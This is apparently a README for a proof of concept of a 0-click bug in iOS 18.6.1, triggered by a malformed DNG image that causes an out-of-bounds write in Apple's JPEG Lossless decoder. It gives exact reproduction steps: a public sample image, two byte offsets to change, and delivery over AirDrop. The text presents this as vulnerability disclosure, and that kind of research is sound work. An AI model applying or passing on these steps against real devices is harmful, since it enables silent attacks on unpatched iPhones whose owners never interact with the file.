iOS 18.6.1 0-click RCE POC# iOS 18.6.1 0-click RCE POC
The vulnerability seems to be in the Apple's implementation of JPEG Lossless Decompression code which is used inside Adobe's DNG file format. I modified `SamplePerPixel` of the `SubIFD` directory of a DNG to reach the vulnerable function and decreased the `component` count of the `SOF3` block to trigger what seems like an oob write.
`RawCamera.bundle` where all of the vulnerable code lies seems to stripped off symbols so it's hard to explain the code path but I leave that for the reader to figure out. Not all DNG files that have JPEG Lossless compression seems to be reaching this vulnerable path, I used Adobe's offical `Adobe DNG Converter` tool and also `dnglab` to export DNG files with this compression type but never reached this code path until this very specific sample DNG I linked below. This POC doesn't crash iOS 18.6.2 so I assume it's the same bug :P
## Reproduction steps:
1. Download https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/1638788346
2. Modify the following bytes:
```
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
```
3. Airdrop etc
[4.0K] /data/pocs/61e24c6d37c1a8eed22114bd880860a388427b47
└── [1.1K] README.md
0 directories, 1 file